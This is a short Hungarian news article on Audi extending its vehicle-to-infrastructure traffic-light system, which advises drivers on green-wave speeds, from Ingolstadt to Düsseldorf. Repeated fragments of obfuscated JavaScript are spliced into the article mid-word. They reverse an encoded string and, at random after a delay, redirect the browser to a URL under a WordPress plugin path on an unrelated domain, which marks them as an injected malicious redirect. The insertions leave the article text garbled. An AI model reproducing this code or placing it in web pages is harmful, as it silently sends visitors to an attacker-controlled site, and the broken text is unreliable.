Ingolstadt után Düsseldorfban is bevezeti V2I (jármű és infrastruktúra közötti kommunikáció) rendszerét az Audi. A technológia lényege, hogy a városban működő jelzőlámpák (a 600-ból egyelőre 150, nyárra már 450) jeleket küldenek az autóknak, tájékoztatva a fedélzeti információs rendszert arról, hogy mikor váltanak zöldre, illetve pirosra. Ebből az autó kiszámítja, hogy milyen sebességgel kellene haladni a zöldhullám eléréséhez, és erről tájékoztatja a vezetőt. Így elkerülhető a hirtelen fékezés, ami balesetveszélyes, és még inkább a felesleges gyorsítás, ami pedig üzemanyag-pazarló. Ha a zöldhullám nem valósul meg, a rendszer visszaszámlálást indít a zöldig, így a vezető tudja, mikor mehet toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tovább – ezt a…
A cikk folytatódik: $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokalauz.co.hu/ujdonsag/2020/02/03/eddig-bejott-a-zoldhullam.html" target="_blank">http://autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokalauz.co.hu/ujdonsag/2020/02/03/eddig-bejott-a-zoldhullam.html
- Hirdetés -